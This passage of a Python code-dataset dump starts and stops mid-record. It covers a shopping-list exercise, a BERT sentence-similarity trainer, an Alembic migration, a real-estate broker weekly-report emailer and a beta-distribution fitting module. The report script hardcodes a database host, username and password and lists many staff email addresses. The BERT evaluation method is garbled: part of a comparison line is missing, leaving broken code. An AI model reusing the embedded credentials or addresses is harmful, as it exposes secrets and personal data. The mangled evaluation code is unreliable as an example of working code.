pps2.__class__.__name__)\n","sub_path":"tools/telemetry/telemetry/page/page_set_unittest.py","file_name":"page_set_unittest.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"56335896","text":"# Ostoslistaohjelma\n# luodaan tyhjä ostoslista\nostoslista = []\n\nwhile True:\n # kysytä��n käyttäjältä mitä halutaan tehdä\n print(\"Haluatko\")\n print(\"(1)Lisätä listaan\")\n print(\"(2)Poistaa listalta vai\")\n valinta = input(\"(3)Lopettaa?:\")\n\n try:\n if valinta == \"1\": # lisätään ostoslistaan tavaroita\n tavara = input(\"Mitä lisätään?:\")\n ostoslista.append(tavara)\n elif valinta == \"2\": # poistetaan ostoslistalta haluttu alkio\n print(\"Listalla on\", len(ostoslista), \"alkiota.\")\n poistettava = int(input(\"Monesko niistä poistetaan?:\"))\n ostoslista.pop(poistettava)\n elif valinta == \"3\": # tulostetaan lista ja päätetään ohjelma\n print(\"Listalla oli tuotteet:\")\n for alkio in ostoslista:\n print(alkio)\n break\n else:\n # käyttäjän antama valinta ei täsmää, nostetaan poikkeus\n raise Exception\n except Exception:\n # käsitellään käyttäjän antamat virheelliset syötteet\n print(\"Virheellinen valinta.\")\n\n","sub_path":"Python-kurssi/teht_12.2.py","file_name":"teht_12.2.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"236805220","text":"#!/usr/bin/python3\n\"\"\"start doc\"\"\"\n\n\nclass Student():\n \"\"\" student info gather\"\"\"\n def __init__(self, first_name, last_name, age):\n \"\"\" init \"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n \"\"\" class to json\n @attrs: attribute list\"\"\"\n if attrs is None:\n return self.__dict__\n temp = self.__dict__.keys()\n new = {}\n for i in attrs:\n if type(i) != str:\n return self.__dict__\n if i in temp:\n new.update({i: self.__dict__[i]})\n return new\n","sub_path":"0x0B-python-input_output/10-student.py","file_name":"10-student.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"257355300","text":"import classes\nfrom firebase import firebase\n\ntext = \"the dosa was very good and above average\"\n\nsplitter = classes.Splitter()\npostagger = classes.POSTagger()\n\nsplitted_sentences = splitter.split(text)\n\n#print(splitted_sentences)\n\npos_tagged_sentences = postagger.pos_tag(splitted_sentences)\n\n#print (pos_tagged_sentences)\n \n \ndicttagger = classes.DictionaryTagger([ 'pos.yml', 'neg.yml','food.yml'])\n\ndict_tagged_sentences = dicttagger.tag(pos_tagged_sentences)\n\nprint(dict_tagged_sentences)\nhotel = \"shantisagar\"\nt = []\n\ndef value_of(sentiment):\n if sentiment == 'positive': return 1\n if sentiment == 'negative': return -1\n if \"food\" in sentiment:\n t.append(sentiment[5:])\n return 0\n\ndef sentiment_score (review): \n return sum ([value_of(tag) for sentence in dict_tagged_sentences for token in sentence for tag in token[2]])\nscore = sentiment_score(dict_tagged_sentences)\nprint(score)\nprint(t)\n\nfirebase=firebase.FirebaseApplication('https://travelinstyle-534e6.firebaseio.com')\nresult = firebase.post('/reviews/' + hotel + \"/\",{'food' : t[0],'score': score})\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"330859987","text":"from utils import CosineLayer \nfrom keras_bert import load_trained_model_from_checkpoint\nimport tensorflow as tf\nfrom keras.layers import *\nfrom keras.models import Model\nfrom keras.optimizers import Adam\n\nfrom data3 import train_data_generator\nfrom keras.callbacks import EarlyStopping\n\nclass BertConfig():\n #Configuration for BertModel\n def __init__(self,\n learning_rate=5e-4,\n min_learning_rate=1e-5,\n maxlen = 510,\n config_path=r\"./bert_config.json\",\n checkpoint_path='./bert_model.ckpt',\n dict_path='./vocab.txt',\n trainable=False):\n '''\n learning_rate:学习率\n min_learning_rate:最低学习率\n maxlen = 510 最长输入文本长度,超过将被截断\n config_path:bert模型配置文件\n checkpoint_path:bert模型数据文件\n dict_path: bert模型字典文件\n trainable: 是否训练bert模型\n\n '''\n self.learning_rate=learning_rate\n self.min_learning_rate=min_learning_rate\n self.maxlen=maxlen\n self.trainable=trainable\n self.config_path=config_path\n self.dict_path=dict_path\n self.checkpoint_path=checkpoint_path\n self.dropout=0.15\n\n\nclass BertModel():\n def __init__(self,config):\n self.config=config\n self.bert_model = load_trained_model_from_checkpoint(config.config_path, config.checkpoint_path, seq_len=None)\n \n def build_model(self):\n self.inputs=[]\n self.outputs=[]\n \n input_x_word=Input(shape=(None,))\n input_mask=Input(shape=(None,))\n output_mask=Input(shape=(None,),dtype=\"bool\") #text\n \n self.inputs.append(input_x_word)\n self.inputs.append(input_mask)\n self.inputs.append(output_mask)\n \n x = self.bert_model([input_x_word, input_mask])\n bert_out = Lambda(lambda x:tf.boolean_mask(x[0],x[1]))([x,output_mask])\n \n input_x_word=Input(shape=(None,))\n input_mask=Input(shape=(None,))\n output_mask=Input(shape=(None,),dtype=\"bool\") #short1\n\n self.inputs.append(input_x_word)\n self.inputs.append(input_mask)\n self.inputs.append(output_mask)\n\n x = self.bert_model([input_x_word, input_mask])\n bert_out1 = Lambda(lambda x:tf.boolean_mask(x[0],x[1]))([x,output_mask])\n\n input_x_word=Input(shape=(None,))\n input_mask=Input(shape=(None,))\n output_mask=Input(shape=(None,),dtype=\"bool\") #short2\n\n self.inputs.append(input_x_word)\n self.inputs.append(input_mask)\n self.inputs.append(output_mask)\n \n x = self.bert_model([input_x_word, input_mask])\n bert_out2 = Lambda(lambda x:tf.boolean_mask(x[0],x[1]))([x,output_mask])\n\n input_x_word=Input(shape=(None,))\n input_mask=Input(shape=(None,))\n output_mask=Input(shape=(None,),dtype=\"bool\") #descript\n\n self.inputs.append(input_x_word)\n self.inputs.append(input_mask)\n self.inputs.append(output_mask)\n \n x = self.bert_model([input_x_word, input_mask])\n bert_out3 = Lambda(lambda x:tf.boolean_mask(x[0],x[1]))([x,output_mask])\n \n cosine = CosineLayer()\n similarity = Lambda(lambda x:cosine(x[0],x[1]))([bert_out1,bert_out2])\n \n concat=Lambda(lambda x:K.concatenate([x[0],x[1]] , axis=0))([bert_out,bert_out3])\n concat = Lambda(lambda x:tf.reshape(x,[-1,768*4]))(concat)\n concat=Lambda(lambda x:K.concatenate([x[0],x[1]] , axis=1))([concat,similarity])\n\n dense = Dense(256, activation='relu')(concat)\n dropout = Dropout(self.config.dropout)(dense)\n out = Dense(1,activation='sigmoid')(dropout)\n\n self.outputs.append(out)\n\n self.model = Model(inputs = self.inputs,outputs = self.outputs)\n self.model.compile(optimizer=Adam(self.config.learning_rate),\n loss='binary_crossentropy')\n\n\n def eval(self,data):\n test=data.test_batch()\n acc_max=0\n f1_max=0\n res=[]\n ans=[]\n _eval=[]\n for i in range(data.test_step):\n x,y=next(test)\n r=model.model.predict(x)\n for j in range(len(r)):\n res.append(r[j][0])\n ans.append(y[j])\n for j in range(99):\n threshold=j*0.01\n tp=0\n fp=0\n tn=0\n fn=0\n for k in range(len(res)):\n if res[k]>threshold:\n if ans[k]==1:\n tp+=1\n if ans[k]==0:\n fp+=1\n if res[k]acc_max):\n acc_max=acc\n if(tp==0 or fp==0 or fn==0 or tn==0):\n continue\n print(\"threshold:{0} acc:{1} recall:{2} pre:{3} f1:{4}\".format(threshold,acc,recall,pre,f1))\n return acc_max\n \nif __name__=='__main__':\n config=BertConfig()\n model=BertModel(config)\n model.build_model()\n \n data=train_data_generator()\n train=data.train_batch()\n test=data.test_batch()\n\n acc_max=0\n \n for i in range(50):\n model.model.load_weights(\"bert_model3_epoch0\")\n model.model.fit_generator(\n train,\n steps_per_epoch=data.train_step,\n epochs=1,\n validation_data=test,\n validation_steps=data.test_step,\n )\n acc=model.eval(data)\n if(acc>acc_max):\n acc_mac=acc\n model.model.save_weights(\"bert_model3_epoch\"+str(i))\n\n","sub_path":"model/Bert/bert_model3.py","file_name":"bert_model3.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"491984339","text":"\"\"\"report add date\n\nRevision ID: 19215a5c5cab\nRevises: 36b15b5a5f9b\nCreate Date: 2018-08-07 17:42:35.690961\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '19215a5c5cab'\ndown_revision = '36b15b5a5f9b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'chandao_session_id')\n op.drop_column('user', 'chandao_za')\n op.add_column('weekly_report', sa.Column('end_date', sa.DateTime(), nullable=True))\n op.add_column('weekly_report', sa.Column('start_date', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('weekly_report', 'start_date')\n op.drop_column('weekly_report', 'end_date')\n op.add_column('user', sa.Column('chandao_za', sa.VARCHAR(length=40), nullable=True))\n op.add_column('user', sa.Column('chandao_session_id', sa.VARCHAR(length=40), nullable=True))\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/19215a5c5cab_report_add_date.py","file_name":"19215a5c5cab_report_add_date.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"206734906","text":"#coding: utf-8\r\nimport sys\r\nimport requests\r\nimport arrow\r\nimport json\r\nimport pandas as pd\r\nfrom pandas import Series,DataFrame\r\nimport zhuge_email\r\nimport pymysql\r\nimport xlsxwriter\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.application import MIMEApplication\r\nfrom email.mime.text import MIMEText\r\nfrom email.header import Header\r\nfrom email.utils import parseaddr, formataddr\r\nfrom email import encoders\r\nimport tools\r\n\r\nnow=arrow.now().to('local').format('YYYY-MM-DD HH:mm:ss')\r\ntoday=arrow.now().to('local').format('YYYY-MM-DD')\r\nyestoday=arrow.now().to('local').shift(days=-1).format('YYYY-MM-DD')\r\nyestoday_1=arrow.now().to('local').shift(days=-2).format('YYYY-MM-DD')\r\nbefore_7_days=arrow.now().to('local').shift(days=-7).format('YYYY-MM-DD')\r\nstart_date=before_7_days\r\n#print start_date\r\nbase_path='/data/zhuge/zhuge-sc/test/'\r\n#base_path='C:/Users/zhugefang/Desktop/broker_data/'\r\n\r\nconn1 = pymysql.connect(host='rds7fvc87wvo741u03j7.mysql.rds.aliyuncs.com', user='bi_r', passwd='42f4b17MG9a$f410e*74e0dcC587e!41', port=3306, db='zhuge_bi', charset='utf8')\r\n\r\n#两天分一个的城市\r\nall_a_cus_city = ['bj']\r\n\r\ndef cyc_allot(days):\r\n if days % 2 == 0:\r\n cyc='第一天-周期开始'\r\n return 1\r\n else :\r\n cyc = '第二天-本周期内分配情况'\r\n return 2\r\n\r\n#计算天数\r\ndef days_need():\r\n day_space = (arrow.get(yestoday) - arrow.get(start_date)).days\r\n day_list = []\r\n for i in range(day_space):\r\n i=i+1\r\n day = arrow.get(start_date).to('local').shift(days=i).format('YYYY-MM-DD')\r\n day_space_a=(arrow.get(day)-arrow.get('2018-05-25')).days\r\n if cyc_allot(day_space_a) == 1:\r\n day_2=arrow.get(day).to('local').shift(days=1).format('YYYY-MM-DD')\r\n day_list.append([day,day_2])\r\n else:\r\n pass\r\n print (day_list)\r\n return day_list\r\n\r\n#二手房数据\r\ndef old_house(cyc_str,date,date_1,city):\r\n sql='''\r\n select '%s' as 'cyc_str',A.logogram,A.city_cn,A.broker_phone,A.realname,A.company_name,A.company_node1,\r\n (case when A.cus_use>0 THEN 1 ELSE 0 END) as 'is_used',cus_use,A.allot_count,A.self_count,B.call,C.called,D.call_50,F.callin,F.called_in,\r\n cityarea_count,borough_count,house_num,self_house_num,important,super,A.company_node2,A.company_node3,bd_name\r\n from \r\n (SELECT b.logogram,city_cn,a.broker_phone,realname,company_name,\r\n company_node1,company_node2,company_node3,c.bd_name,\r\n sum(case when LENGTH(max_usetime_am)>2 then 1 else 0 end) as 'cus_use',max(allot_count) as 'allot_count',\r\n max(self_count) as 'self_count',max(borough_count) as 'borough_count',\r\n max(cityarea_count) 'cityarea_count',max(effect_cloud_store_house_num) 'house_num',\r\n max(release_house_num) 'self_house_num',sum(important_promotion_house_num) 'important',\r\n sum(super_promotion_house_num) 'super'\r\n FROM pay_users_count a inner join zhuge_city b on a.city_id=b.id\r\n left join zhuge_bd c on a.broker_phone=c.broker_phone\r\n where 1=1\r\n and date>='%s' and date<='%s' and company_id!=119 and b.logogram='%s'\r\n group by b.logogram,city_cn,a.broker_phone,realname,company_name,company_node1,company_node2,company_node3,bd_name\r\n ) A\r\n LEFT JOIN\r\n -- 拨打客源数\r\n (SELECT broker_phone,count(distinct user_id) as 'call' FROM zhuge_callout where 1=1\r\n and date>='%s' and date<='%s' and is_allot=1 and type='oldhouse'\r\n and city_en='%s'\r\n group by broker_phone) B ON A.broker_phone=B.broker_phone\r\n LEFT JOIN\r\n -- 打通的客源数\r\n (SELECT broker_phone,count(distinct user_id) as 'called' FROM zhuge_callout where 1=1\r\n and date>='%s' and date<='%s' and is_allot=1 and type='oldhouse' \r\n and calltime_seconds>0 and city_en='%s'\r\n group by broker_phone) C ON A.broker_phone=C.broker_phone\r\n LEFT JOIN\r\n -- 50秒以上客源数\r\n (SELECT broker_phone,count(distinct user_id) as 'call_50' FROM zhuge_callout where 1=1\r\n and date>='%s' and date<='%s' and is_allot=1 and type='oldhouse' \r\n and calltime_seconds>=50 and city_en='%s'\r\n group by broker_phone) D ON A.broker_phone=D.broker_phone\r\n LEFT JOIN\r\n -- callin个数\r\n (SELECT broker_phone,count(*) as 'callin',sum(case when calltime_seconds>0 then 1 else 0 end) as 'called_in'\r\n FROM zhuge_callin a where 1=1 and date>='%s' and date<='%s' and type='oldhouse' \r\n and city_en='%s' \r\n group by broker_phone) F ON A.broker_phone=F.broker_phone\r\n '''% (cyc_str,date,date_1,city,date,date_1,city,date,date_1,city,date,date_1,city,date,date_1,city)\r\n df = pd.read_sql(sql, conn1)\r\n return df\r\n\r\ndef city_write():\r\n day_lists=days_need()\r\n cyc_space=len(day_lists)\r\n for city in all_a_cus_city:\r\n file_name = 'broker_use_count_%s_%s.xlsx' % (city, yestoday_1)\r\n file_path = base_path + file_name\r\n write = pd.ExcelWriter(file_path)\r\n base_data=pd.DataFrame()\r\n for date in day_lists:\r\n cyc_str=date[0]+'周期'\r\n base_data_1 = old_house(cyc_str,date[0], date[1],city)\r\n base_data = base_data.append(base_data_1)\r\n base_data=base_data.fillna(0)\r\n base_data[['is_used', 'cus_use', 'allot_count', 'self_count','call','called','call_50', 'callin', 'called_in','cityarea_count','borough_count',\\\r\n 'house_num','self_house_num']] = base_data[['is_used', 'cus_use', 'allot_count', 'self_count','call','called','call_50', 'callin',\\\r\n 'called_in','cityarea_count','borough_count','house_num','self_house_num']].astype(int)\r\n\r\n # BD汇总\r\n bd_count_df = pd.DataFrame(base_data.groupby(['bd_name'])['broker_phone'].agg('count'))\r\n bd_sum_df = pd.DataFrame(base_data.groupby(['bd_name'])['is_used', 'allot_count', 'self_count', 'call', 'called', 'call_50', \\\r\n 'callin', 'called_in','important','super'].agg('sum'))\r\n bd_avg_df = pd.DataFrame(base_data.groupby(['bd_name'])['cityarea_count','borough_count','house_num','self_house_num'].agg('mean'))\r\n bd_df_a = pd.merge(bd_count_df, bd_sum_df, how='left', left_index=True, right_index=True)\r\n bd_df = pd.merge(bd_df_a, bd_avg_df, how='left', left_index=True, right_index=True)\r\n bd_df['broker_use_per'] = bd_df.apply(lambda x: str(round((float(x['is_used']) / x['broker_phone']) * 100, 1)) + '%' if (x['broker_phone'] and x['is_used']) else 0, axis=1)\r\n bd_df['call_50_per'] = bd_df.apply(lambda x: str(round((float(x['call_50']) / x['called']) * 100, 1)) + '%' if (x['called'] and x['call_50']) else 0, axis=1)\r\n bd_df['call_per'] = bd_df.apply(lambda x: str(round((float(x['call']) / x['allot_count']) * 100, 1)) + '%' if (x['call'] and x['allot_count']) else 0, axis=1)\r\n bd_df['broker_phone'] = bd_df['broker_phone'] / 3.0\r\n bd_df['is_used'] = bd_df['is_used'] / 3.0\r\n bd_df.reset_index(inplace=True)\r\n bd_df = bd_df[[ 'bd_name', 'broker_phone', 'is_used', 'broker_use_per', 'allot_count','self_count', 'call', 'called', 'call_50', 'call_50_per',\\\r\n 'callin', 'called_in','important', 'super', 'cityarea_count', 'borough_count', 'house_num','self_house_num']]\r\n bd_df.sort_values(by=['broker_phone'], ascending=False, inplace=True)\r\n bd_df = bd_df.fillna(0)\r\n bd_df[['broker_phone','is_used','call', 'called', 'call_50', 'callin', 'called_in']] = bd_df[['broker_phone','is_used','call', 'called', 'call_50', 'callin', 'called_in']].astype(int)\r\n bd_df=bd_df.round({'broker_phone':0,'is_used':0,'cityarea_count':1,'borough_count':1,'house_num':1,'self_house_num':1})\r\n bd_df.columns = [ '服务顾问', '服务人数', '使用精选客源功能人数', '精选客源功能使用率','分配客源总数', '尝试联系客源总数', '拨打的客源数', '接通的客源数',\\\r\n '50秒以上客源数', '50秒以上占比','来电总量', '来电总量(接通)','重点推广房源数', '超级推广房源数','人均认领商圈数','人均认领小区数',\\\r\n '云门店房源总数(人均)', '自发布房源总数(人均)']\r\n # 城市汇总\r\n city_count_df = pd.DataFrame(base_data.groupby(['cyc_str','city_cn'])['broker_phone'].agg('count'))\r\n city_sum_df = pd.DataFrame(base_data.groupby(['cyc_str','city_cn'])[ 'is_used', 'allot_count', 'self_count', 'call', 'called', 'call_50', \\\r\n 'callin', 'called_in', 'important', 'super'].agg('sum'))\r\n city_avg_df = pd.DataFrame(base_data.groupby(['cyc_str', 'city_cn'])['cityarea_count', 'borough_count', 'house_num','self_house_num'].agg('mean'))\r\n city_df_a = pd.merge(city_count_df, city_sum_df, how='left', left_index=True, right_index=True)\r\n city_df = pd.merge(city_df_a, city_avg_df, how='left', left_index=True, right_index=True)\r\n city_df['broker_use_per'] = city_df.apply(lambda x: str(round((float(x['is_used']) / x['broker_phone']) * 100, 1)) + '%' if (x['broker_phone'] and x['is_used']) else 0, axis=1)\r\n city_df['call_50_per'] = city_df.apply(lambda x: str(round((float(x['call_50']) / x['called']) * 100, 1)) + '%' if (x['called'] and x['call_50']) else 0, axis=1)\r\n city_df['call_per'] = city_df.apply(lambda x: str(round((float(x['call']) / x['allot_count']) * 100, 1)) + '%' if (x['call'] and x['allot_count']) else 0, axis=1)\r\n city_df.reset_index(level=['cyc_str', 'city_cn'], inplace=True)\r\n city_df = city_df[['cyc_str', 'city_cn', 'broker_phone', 'is_used', 'broker_use_per', 'allot_count', 'self_count', 'call','called', 'call_50', 'call_50_per', \\\r\n 'callin', 'called_in', 'important', 'super', 'cityarea_count', 'borough_count', 'house_num','self_house_num']]\r\n #city_df.sort_values(by=['broker_phone'], ascending=False, inplace=True)\r\n city_df = city_df.fillna(0)\r\n city_df[['broker_phone', 'is_used', 'call', 'called', 'call_50', 'callin', 'called_in']] = city_df[['broker_phone', 'is_used', 'call', 'called', 'call_50', 'callin', 'called_in']].astype(int)\r\n city_df = city_df.round({'cityarea_count': 1, 'borough_count': 1, 'house_num': 1, 'self_house_num': 1})\r\n city_df.columns = ['周期', '城市', '付费人数', '使用精选客源功能人数', '精选客源功能使用率', '分配客源总数', '尝试联系客源总数', '拨打的客源数', '接通的客源数', \\\r\n '50秒以上客源数', '50秒以上占比', '来电总量', '来电总量(接通)', '重点推广房源数', '超级推广房源数', '人均认领商圈数', '人均认领小区数', \\\r\n '云门店房源总数(人均)', '自发布房源总数(人均)']\r\n\r\n # 公司汇总\r\n com_count_df = pd.DataFrame(base_data.groupby(['company_name'])['broker_phone'].agg('count'))\r\n com_sum_df = pd.DataFrame(base_data.groupby([ 'company_name'])['is_used', 'allot_count', 'self_count', 'call', 'called', 'call_50', \\\r\n 'callin', 'called_in', 'important', 'super'].agg('sum'))\r\n com_avg_df = pd.DataFrame(base_data.groupby([ 'company_name'])['cityarea_count', 'borough_count','house_num','self_house_num'].agg( 'mean'))\r\n com_df_a = pd.merge(com_count_df, com_sum_df, how='left', left_index=True, right_index=True)\r\n com_df = pd.merge(com_df_a, com_avg_df, how='left', left_index=True, right_index=True)\r\n com_df['broker_use_per'] = com_df.apply(lambda x: str(round((float(x['is_used']) / x['broker_phone']) * 100, 1)) + '%' if (x['broker_phone'] and x['is_used']) else 0, axis=1)\r\n com_df['call_50_per'] = com_df.apply(lambda x: str(round((float(x['call_50']) / x['called']) * 100, 1)) + '%' if (x['called'] and x['call_50']) else 0, axis=1)\r\n com_df['call_per'] = com_df.apply(lambda x: str(round((float(x['call']) / x['allot_count']) * 100, 1)) + '%' if (x['call'] and x['allot_count']) else 0, axis=1)\r\n com_df['broker_phone'] = com_df['broker_phone']/3\r\n com_df['is_used'] = com_df['is_used'] / 3\r\n com_df.reset_index(inplace=True)\r\n com_df = com_df[['company_name', 'broker_phone', 'is_used', 'broker_use_per', 'allot_count', 'self_count', 'call', 'called', 'call_50', 'call_50_per', \\\r\n 'callin', 'called_in', 'important', 'super', 'cityarea_count', 'borough_count','house_num','self_house_num']]\r\n com_df.sort_values(by=['broker_phone'], ascending=False, inplace=True)\r\n com_df = com_df.fillna(0)\r\n com_df[['broker_phone', 'is_used', 'call', 'called', 'call_50', 'callin', 'called_in']] = com_df[['broker_phone', 'is_used', 'call', 'called', 'call_50', 'callin', 'called_in']].astype(int)\r\n com_df = com_df.round({'broker_phone':0,'is_used':0,'cityarea_count': 1, 'borough_count': 1, 'house_num': 1, 'self_house_num': 1})\r\n com_df.columns = [ '公司名称', '付费人数', '使用精选客源功能人数', '精选客源功能使用率', '分配客源总数', '尝试联系客源总数', '拨打的客源数', '接通的客源数', \\\r\n '50秒以上客源数', '50秒以上占比', '来电总量', '来电总量(接���)', '重点推广的房源数', '超级推广房源数', '人均认领商圈数', '人均认领小区数', \\\r\n '云门店房源总数(人均)', '自发布房源总数(人均)']\r\n # 经纪人\r\n base_data.drop(['logogram', 'is_used'], axis=1, inplace=True)\r\n base_data.columns = ['周期', '城市', '经纪人手机号', '姓名', '公司', '区域', '使用客源功能天数', '实际获取的客源数', '尝试联系数量','拨打数量', '接通数量', '50秒以上', '来电数量', \\\r\n '来电数量(接通)', '认领商圈数', '认领小区数', '云门店房源数', '云门店自发房源数', '重点推广','超级推广','部门', '门店','服务顾问']\r\n\r\n bd_df.to_excel(write, '服务顾问详细数据', index=False)\r\n com_df.to_excel(write, '公司汇总数据', index=False)\r\n base_data.to_excel(write, '经纪人详细数据', index=False)\r\n write.close()\r\n html_text_0 = tools.to_html('城市数据总览-%s' % cyc_str, city_df)\r\n html_text_1 = tools.to_html('bd完成情况%s' % cyc_str, bd_df)\r\n html_text_2 = tools.to_html('各公司数据汇总', com_df)\r\n send_msg = city + '-date@zhugefang.com'\r\n html_text = html_text_0 + html_text_1 + html_text_2\r\n #zhuge_email.sendmail('【%s-二手房日报-%s】' % (city,cyc_str), '%s' % html_text, 'sc-data@zhugefang.com',['liuqiang@zhugefang.com'],[], [file_path])\r\n zhuge_email.sendmail('【%s-二手房周汇总-%s-%s】' % (city, yestoday, before_7_days), '%s' % html_text,'liuqiang@zhuge.com', [send_msg],['liuqiang@zhuge.com','qichangnian@zhuge.com','wangyang@zhuge.com','zhankui@zhuge.com','wujunrong@zhuge.com','liuchunhui@zhuge.com','huangzhicong@zhuge.com'],[file_path])\r\n\r\ncity_write()","sub_path":"report_daily/oldhouse/week_data/a_old_house_week_data.py","file_name":"a_old_house_week_data.py","file_ext":"py","file_size_in_byte":15568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"91579868","text":"# ---\n# jupyter:\n# jupytext:\n# cell_metadata_json: true\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.6.0\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# ### Density Estimation of Subjective Distribution of Income Growth\n#\n# - Following Manski et al.(2009)\n# - Depending on the locations and number of bins, there are three cases \n# - case 1. 3+ intervales with positive probabilities, to be fitted with a generalized beta distribution\n# - case 2. exactly 2 adjacent intervals with positive probabilities, to be fitted with a triangle distribution \n# - case 3. one interval only, to be fitted with a uniform distribution\n\nfrom scipy.stats import gamma\nfrom scipy.stats import beta \nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nimport numpy as np\nimport pandas as pd\n\n\n# ### Case 1. Generalized Beta Distribution\n\n# + {\"code_folding\": [0]}\ndef GeneralizedBetaEst(bin,\n probs,\n rep = 3):\n \"\"\"\n This fits a histogram with positive probabilities in at least 3 bins to a generalized beta distribution.\n Depending on if there is open-ended bin on either side with positive probability, \n the estimator decides to estimate 2 or 4 parameters, respectively. \n \n paramters\n ---------\n bin: ndarray, (n+1) x 1 \n positions for n bins in the histograms \n \n probs: ndarrray n x 1\n each entry is a probability for each of the n bins given by the surveyee, between 0 and 1\n \n returns\n -------\n moments: ndarray of 2 or 4 \n 2: alpha and beta \n 4: alpha, beta, lb, ub, e.g. lb=0 and ub=1 for a standard beta distribution\n \"\"\"\n # n+1 bins and n probs, both are arrays\n if sum([probs[i] > 0 for i in range(len(bin)-1)])<3:\n print(\"Warning: at least three bins with positive probs are needed\")\n para_est = None\n if sum(probs) != 1:\n print(\"probs need to sum up to 1\")\n para_est = None\n else:\n cdf = np.cumsum(probs)\n pprob = [i for i in range(len(bin)-1) if probs[i]>0]\n lb = bin[min(pprob)]\n print(\"lower bound is \"+str(lb))\n ub = bin[max(pprob)+1]\n print(\"upper bound is \"+str(ub))\n x0_2para = (2,1)\n x0_4para = (2,1,0,1) \n def distance2para(paras2): # if there is no open-ended bin with positive probs \n a,b = paras2\n distance = sum((beta.cdf(bin[1:],a,b,loc=lb,scale=ub-lb)-cdf)**2)\n return distance\n def distance4para(paras4): # if either on the left or right side one open-ended bin is with postive probs\n a,b,lb,ub = paras4\n distance = sum((beta.cdf(bin[1:],a,b,loc=lb,scale=ub-lb)-cdf)**2)\n return distance\n \n ## 4-parameter estimation\n if lb == bin[0] and ub == bin[-1]:\n para_est_holder = np.zeros(4)\n suc_ct = 0\n for time in range(rep):\n para_est_rs = minimize(distance4para,\n x0_4para,\n method='CG',\n options={'disp':True,\n 'gtol': 1e-06})\n para_est = para_est_rs['x']\n print(para_est_rs)\n if not np.isnan(para_est).any():\n suc_ct = suc_ct+1 ## only counts the times of success to divide for avearge \n para_est_holder = para_est_holder + para_est \n para_est = para_est_holder/suc_ct \n \n ## 2-parameter estimation\n else:\n para_est_holder = np.zeros(2)\n suc_ct = 0\n for time in range(rep):\n para_est_rs = minimize(distance2para,\n x0_2para,\n method='CG',\n options={'disp':True,\n 'gtol': 1e-06})\n para_est = para_est_rs['x']\n print(para_est_rs)\n if not np.isnan(para_est).any(): ## if para_est is not null \n suc_ct = suc_ct+1 ## only counts the times of success to divide for avearge \n para_est_holder = para_est_holder + para_est\n para_est = para_est_holder/suc_ct\n return para_est # could be 2 or 4 parameters \n\n\n# + {\"code_folding\": [0]}\ndef GeneralizedBetaStats(a,b,lb,ub):\n \"\"\"\n This function computes the moments of a generalized beta distribution, mean and variance for now. \n \n parameters\n ----------\n a, b, lb, ub: floats\n \n returns\n -------\n dict: 4 keys\n mean, float \n variance, float\n skewness,float\n kurtosis,float\n \"\"\"\n # lb=0 and ub=1 for a standard beta distribution\n \n mean, var, skew, kurt = beta.stats(a, b, loc=lb, scale=ub-lb, moments='mvsk')\n #mean = lb + (ub-lb)*a/(a+b)\n #var = (ub-lb)**2*a*b/((a+b)**2*(a+b+1))\n return {\"mean\": mean,\n \"variance\":var,\n \"skewness\":skew,\n \"kurtosis\":kurt}\n\n\n# -\n\n# ### Case 2. Isosceles Triangle distribution\n#\n# Two adjacent intervales $[a,b]$,$[b,c]$ are assigned probs $\\alpha$ and $1-\\alpha$, respectively. In the case of $\\alpha<1/2$, we need to solve parameter $t$ such that $[b-t,c]$ is the interval of the distribution. Denote the height of the trangle distribution $h$. Then following two restrictions need to satisfy\n#\n# \\begin{eqnarray}\n# \\frac{t^2}{t+c-b} h = \\alpha \\\\\n# (t+(c-b))h = 2\n# \\end{eqnarray}\n#\n# The two equations can solve $t$ and $h$\n#\n# $$\\frac{t^2}{(t+c-b)^2}=\\alpha$$\n#\n# $$t^2 = \\alpha t^2 + 2\\alpha t(c-b) + \\alpha(c-b)^2$$\n#\n# $$(1-\\alpha) t^2 - 2\\alpha(c-b) t - \\alpha(c-b)^2=0$$\n#\n# $$\\implies t =\\frac{2\\alpha(c-b)+\\sqrt{4\\alpha^2(c-b)^2+4(1-\\alpha)\\alpha(c-b)^2}}{2(1-\\alpha)} = \\frac{\\alpha(c-b)+(c-b)\\sqrt{\\alpha}}{(1-\\alpha)}$$\n#\n# $$\\implies h = \\frac{2}{t+c-b}$$\n#\n\n# + {\"code_folding\": [0]}\ndef TriangleEst(bin,probs):\n \"\"\"\n The function fits histograms with exactly two adjacent \n bins of positive probabilitie to a isosceles triangular distribution.\n It genetes the bounds of the isoceles triangle distribution. \n \n paramters\n ---------\n bin: ndarray, (n+1) x 1 \n positions for n bins in the histograms \n \n probs: ndarrray n x 1\n each entry is a probability for each of the n bins given by the surveyee, between 0 and 1\n \n returns\n --------\n dict: 3 keys\n lb: float, left bound \n ub: float, right bound\n h: float, height of the triangle\n \n 